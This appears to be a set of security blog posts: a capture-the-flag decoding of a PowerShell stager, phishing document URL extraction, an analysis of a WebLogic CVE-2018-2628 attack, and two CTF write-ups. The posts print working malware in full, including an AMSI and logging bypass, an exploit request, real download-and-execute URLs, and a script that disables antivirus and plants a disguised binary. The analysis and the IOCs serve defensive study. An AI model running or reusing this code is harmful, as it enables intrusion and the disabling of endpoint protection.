powershell -noP -sta -w 1 -enc  JABHAHIAbwBVAFAAUABPAEwAaQBDAFkAUwBFAHQAdABJAE4ARwBzACAAPQAgAFsAcgBFAEYAXQAuAEEAUwBzAGUATQBCAEwAWQAuAEcARQB0AFQAeQBwAEUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBVAHQAaQBsAHMAJwApAC4AIgBHAEUAdABGAEkARQBgAGwAZAAiACgAJwBjAGEAYwBoAGUAZABHAHIAbwB1AHAAUABvAGwAaQBjAHkAUwBlAHQAdABpAG4AZwBzACcALAAgACcATgAnACsAJwBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkALgBHAEUAVABWAGEAbABVAGUAKAAkAG4AdQBsAEwAKQA7ACQARwBSAG8AdQBQAFAATwBsAEkAQwB5AFMAZQBUAFQAaQBOAGcAUwBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4AZwAnAF0AIAA9ACAAMAA7ACQARwBSAG8AdQBQAFAATwBMAEkAQwBZAFMARQB0AFQAaQBuAGcAUwBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsASQBuAHYAbwBjAGEAdABpAG8AbgBMAG8AZwBnAGkAbgBnACcAXQAgAD0AIAAwADsAWwBSAGUAZgBdAC4AQQBzAFMAZQBtAEIAbAB5AC4ARwBlAFQAVAB5AFAARQAoACcAUwB5AHMAdABlAG0ALgBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAEEAbQBzAGkAVQB0AGkAbABzACcAKQB8AD8AewAkAF8AfQB8ACUAewAkAF8ALgBHAEUAdABGAGkAZQBMAGQAKAAnAGEAbQBzAGkASQBuAGkAdABGAGEAaQBsAGUAZAAnACwAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQAuAFMARQBUAFYAYQBMAHUARQAoACQATgB1AGwATAAsACQAVAByAHUAZQApAH0AOwBbAFMAeQBzAFQAZQBtAC4ATgBlAFQALgBTAEUAcgBWAEkAYwBlAFAATwBJAG4AdABNAEEAbgBBAGcARQBSAF0AOgA6AEUAeABwAEUAYwB0ADEAMAAwAEMATwBuAFQAaQBuAHUARQA9ADAAOwAkAFcAQwA9AE4ARQBXAC0ATwBCAGoARQBjAFQAIABTAHkAcwBUAEUATQAuAE4ARQB0AC4AVwBlAEIAQwBsAEkARQBuAHQAOwAkAHUAPQAnAE0AbwB6AGkAbABsAGEALwA1AC4AMAAgACgAVwBpAG4AZABvAHcAcwAgAE4AVAAgADYALgAxADsAIABXAE8AVwA2ADQAOwAgAFQAcgBpAGQAZQBuAHQALwA3AC4AMAA7ACAAcgB2ADoAMQAxAC4AMAApACAAbABpAGsAZQAgAEcAZQBjAGsAbwAnADsAJAB3AEMALgBIAGUAYQBEAGUAcgBTAC4AQQBkAGQAKAAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJwAsACQAdQApADsAJABXAGMALgBQAFIAbwBYAHkAPQBbAFMAeQBzAFQAZQBNAC4ATgBFAFQALgBXAGUAYgBSAGUAcQB1AEUAcwB0AF0AOgA6AEQAZQBmAGEAVQBMAHQAVwBlAEIAUABSAE8AWABZADsAJAB3AEMALgBQAFIAbwBYAFkALgBDAFIARQBEAGUATgB0AEkAYQBMAFMAIAA9ACAAWwBTAFkAUwBUAGUATQAuAE4ARQBUAC4AQwByAGUARABFAG4AVABpAGEATABDAGEAQwBoAGUAXQA6ADoARABlAEYAYQB1AEwAVABOAEUAdAB3AE8AcgBrAEMAcgBlAGQAZQBuAHQAaQBBAGwAUwA7ACQASwA9AFsAUwBZAFMAdABFAE0ALgBUAGUAeAB0AC4ARQBOAEMATwBEAEkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcARQB0AEIAeQB0AEUAcwAoACcARQAxAGcATQBHAGQAZgBUAEAAZQBvAE4APgB4ADkAewBdADIARgA3ACsAYgBzAE8AbgA0AC8AUwBpAFEAcgB3ACcAKQA7ACQAUgA9AHsAJABEACwAJABLAD0AJABBAHIAZwBTADsAJABTAD0AMAAuAC4AMgA1ADUAOwAwAC4ALgAyADUANQB8ACUAewAkAEoAPQAoACQASgArACQAUwBbACQAXwBdACsAJABLAFsAJABfACUAJABLAC4AQwBvAHUAbgBUAF0AKQAlADIANQA2ADsAJABTAFsAJABfAF0ALAAkAFMAWwAkAEoAXQA9ACQAUwBbACQASgBdACwAJABTAFsAJABfAF0AfQA7ACQARAB8ACUAewAkAEkAPQAoACQASQArADEAKQAlADIANQA2ADsAJABIAD0AKAAkAEgAKwAkAFMAWwAkAEkAXQApACUAMgA1ADYAOwAkAFMAWwAkAEkAXQAsACQAUwBbACQASABdAD0AJABTAFsAJABIAF0ALAAkAFMAWwAkAEkAXQA7ACQAXwAtAGIAeABvAFIAJABTAFsAKAAkAFMAWwAkAEkAXQArACQAUwBbACQASABdACkAJQAyADUANgBdAH0AfQA7ACQAdwBjAC4ASABFAEEAZABFAHIAcwAuAEEARABEACgAIgBDAG8AbwBrAGkAZQAiACwAIgBzAGUAcwBzAGkAbwBuAD0ATQBDAGEAaAB1AFEAVgBmAHoAMAB5AE0ANgBWAEIAZQA4AGYAegBWADkAdAA5AGoAbwBtAG8APQAiACkAOwAkAHMAZQByAD0AJwBoAHQAdABwADoALwAvADEAMAAuADEAMAAuADkAOQAuADUANQA6ADgAMAAnADsAJAB0AD0AJwAvAGwAbwBnAGkAbgAvAHAAcgBvAGMAZQBzAHMALgBwAGgAcAAnADsAJABmAGwAYQBnAD0AJwBIAFQAQgB7ACQAXwBqADAARwBfAHkAMAB1AFIAXwBNADMAbQAwAHIAWQBfACQAfQAnADsAJABEAGEAdABBAD0AJABXAEMALgBEAG8AVwBOAEwAbwBhAEQARABBAFQAQQAoACQAUwBlAFIAKwAkAHQAKQA7ACQAaQB2AD0AJABkAGEAVABBAFsAMAAuAC4AMwBdADsAJABEAEEAdABhAD0AJABEAGEAVABhAFsANAAuAC4AJABEAEEAdABhAC4ATABlAG4ARwBUAEgAXQA7AC0ASgBPAEkATgBbAEMASABBAHIAWwBdAF0AKAAmACAAJABSACAAJABkAGEAdABBACAAKAAkAEkAVgArACQASwApACkAfABJAEUAWAA=

After we decoded it, it appear to be some sort of Powershell instruction for the host machine with various hard-coded parameter e.g. hard-coded User-Agent, IP address, path & HTB flag 😉

$GroUPPOLiCYSEttINGs = [rEF].ASseMBLY.GEtTypE('System.Management.Automation.Utils')."GEtFIE`ld"('cachedGroupPolicySettings', 'N'+'onPublic,Static').GETValUe($nulL);$GRouPPOlICySeTTiNgS['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging'] = 0;$GRouPPOLICYSEtTingS['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging'] = 0;[Ref].AsSemBly.GeTTyPE('System.Management.Automation.AmsiUtils')|?{$_}|%{$_.GEtFieLd('amsiInitFailed','NonPublic,Static').SETVaLuE($NulL,$True)};[SysTem.NeT.SErVIcePOIntMAnAgER]::ExpEct100COnTinuE=0;$WC=NEW-OBjEcT SysTEM.NEt.WeBClIEnt;$u='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';$wC.HeaDerS.Add('User-Agent',$u);$Wc.PRoXy=[SysTeM.NET.WebRequEst]::DefaULtWeBPROXY;$wC.PRoXY.CREDeNtIaLS = [SYSTeM.NET.CreDEnTiaLCaChe]::DeFauLTNEtwOrkCredentiAlS;$K=[SYStEM.Text.ENCODIng]::ASCII.GEtBytEs('[email protected]>x9{]2F7+bsOn4/SiQrw');$R={$D,$K=$ArgS;$S=0..255;0..255|%{$J=($J+$S[$_]+$K[$_%$K.CounT])%256;$S[$_],$S[$J]=$S[$J],$S[$_]};$D|%{$I=($I+1)%256;$H=($H+$S[$I])%256;$S[$I],$S[$H]=$S[$H],$S[$I];$_-bxoR$S[($S[$I]+$S[$H])%256]}};$wc.HEAdErs.ADD("Cookie","session=MCahuQVfz0yM6VBe8fzV9t9jomo=");$ser='http://10.10.99.55:80';$t='/login/process.php';$flag='HTB{$_j0G_y0uR_M3m0rY_$}';$DatA=$WC.DoWNLoaDDATA($SeR+$t);$iv=$daTA[0..3];$DAta=$DaTa[4..$DAta.LenGTH];-JOIN[CHAr[]](& $R $datA ($IV+$K))|IEX

So there you go. The flag is HTB{$_j0G_y0uR_M3m0rY_$}.

Analyzing Phishing Email – Word XML File Analysis

Recently I’ve observed a phishing mail as below:
https://www.virustotal.com/#/file/cf027dd938f1a268f45f2ea786dc538ab47f35006fb12d0b64e0867bccf789c0/detection – clean

The file seems to be clean per VT. Interestingly, on details sections, found 2 URLs under OpenXML Doc Info; section Package Relationships:

To search for these URLs, first you’ll need to rename the Word doc file to compressed zip file. E.g. sample.doc to sample.zip.

Then, extract the zip file. The URLs can be found inside file document.xml.rels (~/sample_folder/word/_rels/):

Its may look simple if you know which & where the file to be look at.

I’m thinking; what if we can search for all the URL/hyperlink in the XML files content of the Word document, without actually having to open it one-by-one.

To do that, we’ll using zipdump, re-search (together with reextra) Python script tools by Didier Stevens:

Download the Python scripts mentioned above and put it into one place. Then, executed this command below:

./zipdump.py -D sample.zip | ./re-search.py -f -n url -u

Command above will search the content of the zip file & extract/applied regex searching for URLs.

As you can see below, these is all the URLs that contained in the Word doc:

Analyzing Oracle WebLogic attack

Recently we received an alert from our WAF related to an attack towards our environment.

Further review of the alert found that the attacker is using Oracle WebLogic RCE Deserialization Vulnerability (CVE-2018-2628).

We observed that the attacker included some sort of PowerShell command in their request:

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_131" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
  <array class="java.lang.String" length="3">
    <void index="0">
      <string>cmd.exe</string>
    </void>
    <void index="1">
      <string>/c</string>
    </void>
    <void index="2">
      <string>Start /Min PowerShell.exe -NoP -NonI -EP ByPass -W Hidden -E JABPAFMAPQAoAEcAVwBtAGkAIABXAGkAbgAzADIAXwBPAHAAZQByAGEAdABpAG4AZwBTAHkAcwB0AGUAbQApAC4AQwBhAHAAdABpAG8AbgA7ACQAVwBDAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAFcAQwAuAEgAZQBhAGQAZQByAHMAWwAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJwBdAD0AIgBQAG8AdwBlAHIAUwBoAGUAbABsAC8AVwBMACsAIAAkAE8AUwAiADsASQBFAFgAIAAkAFcAQwAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADEAMQAuADIAMwAwAC4AMgAyADkALgAyADIANgAvAGkAbQBhAGcAZQBzAC8AdABlAHMAdAAvAEQATAAuAHAAaABwACcAKQA7AA==</string>
    </void>
  </array>
    <void method="start"/>
</void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>

Seems like the PowerShell command is using Base64 encoding for obfuscation. I use CyberChef to decode the base64. Result we get after decoding it:

$OS=(GWmi Win32_OperatingSystem).Caption;$WC=New-Object Net.WebClient;$WC.Headers['User-Agent']="PowerShell/WL+ $OS";IEX $WC.DownloadString('http://111.230.229.226/images/test/DL.php');

Seems like it tried to fetch file DL.php at http://111.230.229.226/images/test/DL.php. Lets try grab that file:

[email protected]:~# wget http://111.230.229.226/images/test/DL.php
--2018-04-29 19:50:27--  http://111.230.229.226/images/test/DL.php
Connecting to 111.230.229.226:80... connected.
HTTP request sent, awaiting response... 404 Not Found
2018-04-29 19:50:28 ERROR 404: Not Found.

Hmm.. Error 404..? Is it true error? Or did we missing something here?

Lets analyze the command carefully:

PS C:\Users\Fossil\Desktop> $OS=(GWmi Win32_OperatingSystem).Caption;
PS C:\Users\Fossil\Desktop> $WC=New-Object Net.WebClient;
PS C:\Users\Fossil\Desktop> $WC.Headers['User-Agent']="PowerShell/WL+ $OS";
PS C:\Users\Fossil\Desktop>
PS C:\Users\Fossil\Desktop> echo $OS;
Microsoft Windows 7 Ultimate
PS C:\Users\Fossil\Desktop> echo $WC.Headers['User-Agent'];
PowerShell/WL+ Microsoft Windows 7 Ultimate

We can see the attacker is assigning/using specific User-Agent when fetching the file. That’s why when we try to wget/curl the file directly, it failed.

So what we need to do is set the User-Agent exactly the same as above when fetching the file. In this case, I’m using curl to fetch the file:

[email protected]:~# curl -v -H User-Agent: "PowerShell/WL Microsoft Windows 7 Professional" http://111.230.229.226/images/test/DL.php
*   Trying 111.230.229.226...
* Connected to 111.230.229.226 (111.230.229.226) port 80 (#0)
> GET /images/test/DL.php HTTP/1.1
> Host: 111.230.229.226
> Accept: */*
> User-Agent: PowerShell/WL Microsoft Windows 7 Professional
<
< HTTP/1.1 200 OK
< Date: Sun, 29 Apr 2018 11:50:23 GMT
< Server: Apache/2.2.21 (Win32) PHP/5.3.10
< X-Powered-By: PHP/5.3.10
< Content-Length: 2539
< Content-Type: text/html
<
$EncodedCompressedFile = '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';$DeflatedStream = New-Object IO.Compression.DeflateStream([IO.MemoryStream][Convert]::FromBase64String($EncodedCompressedFile),[IO.Compression.CompressionMode]::Decompress);$UncompressedFileBytes = New-Object Byte[](3948);$Null=$DeflatedStream.Read($UncompressedFileBytes, 0, 3948);([Text.Encoding]::ASCII.GetString($UncompressedFileBytes)) | IEX;

Ah.. Now see young padawan? Previously if the file been fetch without the User-Agent, it will failed/throw error 404. Again, we see another set of base64 encoding here.

But what is it?

I’m not an expert to explain this, but TL;DR, it convert the base64 encoded string to a memory stream and executes it. I guess ¯_(ツ)_/¯

So, to see what happen if this command executes, we can use this Python script below to decode it. With this script, we can basically see what are those base64 are doing.

We’ll create a Python script named “decodeb64.py“. Copy the base64 we found above, paste it after the encoded parameters; as example below:

#!/usr/bin/python
import base64
import zlib

encoded = "7b0HYBxJliUmL23Ke39K9UrX4HShCIBgEyTYkEAQ7MGIzeaS7B1pRyMpqyqBymVWZV1mFkDM7Z28995777333nvvvfe6O51OJ/ff/z9cZmQBbPbOStrJniGAqsgfP358Hz8ifrcv1m3+7kW2yNPP0o8/L6tJVv6+ezu7Bzv7uw8//o2T321yUudZm8/o69/tWZk1OX0255fokxf51faXk5/Op236+rpp88X4zZyaz4rlxZjbbP1ubb3OR66X0fde5efft1Dv/MZJcZ5u+X//4t84+bHXbVa326/LPF+lhAp9on2OX+VlTkgIcGr9S37jJC+BFF47fVe0/BH++/GvVjMCSeh+d1GYAdZV1f6+02JxuffoZXWV16/neVn+/ifVYpEtZxju4uXZ7LPf7cW6LA/5d3pp63sE4ISG3nw/NbDujF/W1Sqv2yJvvvcxGn78/fFPZuU61wHxu9vLPGVYd9JfnBJ+362LNt/+dtW06UffK76fflnOUmr3KOXmH1GLz/N2myBP86ZJtwmCwjmt66o+nrZFtUxfF2W+bMvrk2rZFst1nv5M+rqtVu61Z1U9zZkMvZHP8vNsXbY/H8aO/3631/Wljv+jn5qvn1bLi2fZ8uL3WX80Sj96UTT09Uejj75ovli9vpzSb9+d4UP5tVg+zc/z5QxNv3hy/MXrvL4spjl9le0dU+9fZOVVVueE+HlFvDud08AJXlosU9OtMPOP/9hrGpi+nm4zPtxym7l8vXpzvcrTp0WTTcr8hvEyNAw4Bo7HftP7P8ZzQgR5fTLO3+UpfXNeXAgExuczi0q/MbrmpsJdRPVB6oKop8sLkHd1spi9Wi/p10XT5DRP9Jsj/uvj1yfrAq8sJtmirbNrNKRfG4/g5nef2NQ7E1uxUM0RMJEQBw2/PhcZErzKL5gGx7NZ+tG3f6/nX/y+r6vz9rvEAr/vF8W0rhr66/clrplVV00qrJPXv+/r1fWLvP0ovXuZfiS/v8pXFYkOkSa926avTj///Z9+98tXT9O7s3QnvXv+oR2evpuW64ZG2fy+L7N23kjXv9vp8vIRWLqoP6Dbl1VZTEnoN/Qv3SkHQUxo0CwmvV53B3uVTtmc/L4n67qmucJM1VVJgvT7Kuc3v6+wEPpjvu11sP+hHahe+Fnsweibn80ujB67qQ/Rl9O6WLUQaN8Cb0GoXpGRqBbp9hckc5/u0M/sXXpvZ+fO4dnp751ueY4A8fj4u/nkpCwIpTvjp9XVsqyy2eu2Jqbf+njetqtHd+/u7u6O9+7tjPf2HtL/P71bLLKLvLlLBuru0+fjVbP78Z3Djw4tSk+u27whvL5n3Iz8XTs+XU4ruBrff/Toq2VBv+djwpSbbul7dwCC2+UzOzgDhOh1SWaMXn9TPSGn4tN9RdLvFBCg60iYQBeWJHn/FSyq/Hpvz0iCs6y/7+XueOf3dX9j5kiB/W7H9cUlIG2/qF6SiqqWZ6SdXqZPrl9m0D3fTb9dzGb5kj5MQ8zxslFRn8lceiqLdBrjKJhuUy/rBU3A84IMrvS5LSi+bq/L3HaCTslnWzvYbPd/ty3z5/jMOmmugTPuonUD4/7J94kH1qBklb58nRoU6bWiSR2QjzrOWwBjexOMF189f/6RNfI/bjgsr2kQ7w4+BXE3cxlNa3uXWpopeffp/m1f+nTfvASKW44Q3fr7vskXq9+3bIim4/z35lbfPYm6yYGQqPARgBg8SAHI/7tuvSEMtmWS6cs7d34xAz4jePxBuq2eRE0dVfX1YfpLzJsswdKQ0RYLdyfdJmp+7+zLMT48W55X378Db+1Vvqgu8377G6yocbq+fA3HET2Sw6jDpvHc24OvuSLHvRYi3BnLT2ANQf9y6LUvydnMYDLNe1++Pq6nc2KXabuu1evcQr+klVpyDj7+dP9jGtyXNXyyL4NPYwwLb/R1+un+9qSAkP0YTZpVWxj+FhhkJKSg93+Mu/Mmgz9Pt/NfRL9mxM9og076gG7JYr//T37xktnM6/SXDIvLxzqCe3sYwcfxERx8+sMbwcGnwyOQ2er2HRkTqREr2TMelFpBkp3X306fEZtfZfQBjOFxWZKenZGauKgzw7QfqUpOJRD8KD1dwishSDBZ/shuZ5t4bN/94kys06bpIO31LCvK9E1lh0AD+CX/Dw=="

# [Convert]::FromBase64String
decoded = base64.b64decode(encoded)

# IO.Compression.DeflateStream
# 15 is the default parameter, negative makes it ignore the gzip header
decompressed = zlib.decompress(decoded, -15)

print decompressed

Save the script and run the Python script as below:

C:\Users\Fossil\Desktop>python decodeb64.py > output_DL_php.txt

This will save all the output from your CMD to text file for easier to ready.
P/S : Your can rename output_DL_php.txt to any filename that you want.

Let’s see whats inside the text file:

$MutexName = 'Global\20180419'
$bCreated = $Flase
$hMutex = New-Object System.Threading.Mutex($true,$MutexName,[Ref]$bCreated)
if ($bCreated)
{
        Start-Sleep 180
        $hMutex.ReleaseMutex()
}
else
{
        Exit
}


#Update
$WmiName = 'root\cimv2:PowerShell_Command'
$mPId=$Null;$mPId = ([WmiClass] $WmiName).Properties['mPId'].Value
if ($mPId -ne $Null) {
        Write-Host "[i] Old PId: $mPId"
        Get-Process -Id $mPId -ErrorAction SilentlyContinue | Stop-Process -Force
}
$WmiName = 'root\default:PowerShell_Command'
$mPId=$Null;$mPId = ([WmiClass] $WmiName).Properties['mPId'].Value
if ($mPId -ne $Null) {
        Write-Host "[i] Old PId: $mPId"
        Get-Process -Id $mPId -ErrorAction SilentlyContinue | Stop-Process -Force
}


$SrvName = "ZhuDongFangYu", "NisSrv","MsMpSvc","WdNisSvc","WinDefend", "MBAMService","a2AntiMalware"
foreach ($Srv in $SrvName)
{
#       Set-Service -Name $Srv -StartupType Disabled -ErrorAction SilentlyContinue
#       Stop-Service -Name $Srv -Force -ErrorAction SilentlyContinue
        $Null = SC.exe Config $Srv Start= Disabled
        $Null = SC.exe Stop $Srv
}
$ProName = "ZhuDongFangYu", "MsMpEng","MpCmdRun","msseces","NisSrv","MSASCui", "mbamtray","mbamservice","a2service"
foreach ($Pro in $ProName)
{
        Get-Process -Name $Pro -ErrorAction SilentlyContinue | Stop-Process -Force
}

$Null = Reg.exe Add "HKLM\SoftWare\Microsoft\Windows Defender\SpyNet" /v "SpyNetReporting" /t REG_DWORD /d 0 /f
$Null = Reg.exe Add "HKLM\SoftWare\Microsoft\Windows Defender\Exclusions\Paths" /v "$Env:WinDir" /t REG_DWORD /d 0 /f
$Null = Reg.exe Add "HKLM\SoftWare\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
$Null = Reg.exe Add HKLM\System\CurrentControlSet\Services\NisSrv /v Start /t REG_DWORD /d 4 /f
$Null = Reg.exe Add HKLM\System\CurrentControlSet\Services\MsMpSvc /v Start /t REG_DWORD /d 4 /f
$Null = Reg.exe Add HKLM\System\CurrentControlSet\Services\WdNisSvc /v Start /t REG_DWORD /d 4 /f
$Null = Reg.exe Add HKLM\System\CurrentControlSet\Services\WinDefend /v Start /t REG_DWORD /d 4 /f


$Script = "Start-Sleep (Get-Random -Min 60 -Max 300);IEX (New-Object Net.WebClient).DownloadString('http://111.230.229.226/images/def/DL.ps1');";
$ScriptBytes = [System.Text.Encoding]::Unicode.GetBytes($Script);
$EncodedScript = [System.Convert]::ToBase64String($ScriptBytes);

$Path = "$Env:SystemRoot\System32\WindowsPowerShell\v1.0\PowerShell.exe"
$Argv = "-NoP -NonI -EP ByPass -W Hidden -E $EncodedScript"
$Process = Start-Process -FilePath $Path -ArgumentList $Argv -WindowStyle Hidden -PassThru
$ProcessId = $($Process.Id)
if ($ProcessId -ne $Null)
{
        Write-Host "[+] Neutrino PS Process Id is $ProcessId"
}
else
{
        Write-Host "[-] Neutrino PS Process Id is NULL"
}


#Downloader
$x86 = "http://111.230.229.226/images/test/x86.exe"
$x64 = "http://111.230.229.226/images/test/x64.exe"
$File = "$Env:WinDir\Temp\lsass.eXe"
$WC = New-Object System.Net.WebClient


$Dir = "$Env:WinDir\Temp";
if (!(Test-Path $Dir)){ New-Item $Dir -Type Directory; }
if (!((Get-Item $File -Force) -is [IO.FileInfo])) { Remove-Item $File -Force -ErrorAction SilentlyContinue }


$OS = (Get-WmiObject Win32_ComputerSystem).SystemType
$SO = (Get-WmiObject Win32_OperatingSystem).OSArchitecture
if (($OS -Match '64') -Or ($SO -Match '64'))
{
        Write-Host "[i] OS 64-bit"
        $WC.DownloadFile($x64, $File)
        if ((Test-Path $File) -eq $False)
        {
                $WC.DownloadFile("http://111.230.229.226/images/test/x64_VMP.exe", $File)
        }
}
else
{
        Write-Host '[i] OS 32-bit'
        $WC.DownloadFile($x86, $File)
        if ((Test-Path $File) -eq $False)
        {
                $WC.DownloadFile("http://111.230.229.226/images/test/x86_VMP.exe", $File)
        }
}

if (Test-Path $File)
{
        Write-Host '[+] Downloaded'
        $Null = NetSH Firewall Add AllowedProgram $File "Windows Update" Enable
        IEX $WC.DownloadString('http://111.230.229.226/images/test/WMI.ps1')
}
else
{
        Write-Host '[-] Fail To Download'
}

As you can see, the command is doing bunch of stuff that I’m lazy to explain 😉
Hope you enjoy reading this.

Here’s some of IOCs that I managed to gather:

017eba5231a63782bdd1d7c8beff5b0b *DL.php
bee2f2223729166c264037a82fa4fed3 *DL.ps1
b5065178c574936a1b7e477929ba1075 *lsass.eXe
1dd6bc7549913b64595540bc77059415 *Neutrino.ps1
dfcb19949d55d35e5d3f1dd569218ce4 *WMI.ps1
ec5e6097038be59e7311f9de8d6354d6 *x64.exe
35cb2b208085bcb5b93ea6420f01c92b *x64_VMP.exe
2129a8287215558e5870c7cc89d0a8fe *x86.exe
c11dbd4777d6ec2b434c424e201c0e6b *x86_VMP.exe

References:
https://gist.githubusercontent.com/strazzere/5faa709a3db9e1dcf3b5/raw/42b98a918bac3725934bcfa3087ac5936d9b88d1/decrypt.py
http://threat.tevora.com/5-minute-forensics-decoding-powershell-payloads/

Wargames 2017 – Challenge 12 : ezfile sharing

Challenge 12 : ezfile sharing

question for challenge 12

and the hint for this challenge:

hint for challenge 12

Initially, one of our teammate was fuzzing around the website and found “.git” folder. Seems related to the hint.

So we try to browse the folder/path:

.git folder/path

Hmm.. As a “layman” person (please guys, don’t try this at home. or any other place. wkwkwkwk), I’ve gone crazy by downloading all the git folder (recursively):

download all git folder content

Not sure why I did that. Maybe for easier to analyze next. Lets see what git -help can provide us with info:

git help menu

hmm.. Lets see if “git show” can provide any clue…

and.. profit! XD

ah! found it! so the flag is: “wgmy:{AdminGitGudPlease}

Wargames 2017 – Challenge 9 : unreachable

The question is:

"The critical server seems unreachable. The sysadmin tries to identify the cause of it..but weird..he is doing it backwardly."
http://files.wargames.my/2/p100.7zv
question for challenge 2
question for challenge 2

and the hint given to us:

hint for challenge 2
hint for challenge 2

so… RFC 792 – something related to ICMP/ping yada yada
so we open the pcap file in Wireshark, view only ICMP protocol:

open pcap using wireshark & then filter ICMP only

we can see ICMP traffic involving 2 IPs; 192.168.1.8 & 192.168.1.10

after digging around, I find out there is some “unique differences” at ping identification number; offset 0010. this involving IP 192.168.1.8:

lets use tshark to see it clearly:

tshark -r pcap1-100_1_copy.pcapng -x 'icmp and ip.src==192.168.1.8' | grep 0010
use tshark & grep offset 0010

as noted in the hint above; “he is tracing backwardly.”

so the flag is: flag_is_p!ngp0ng~
but actually…. the flag is: p!ngp0ng~ =.=’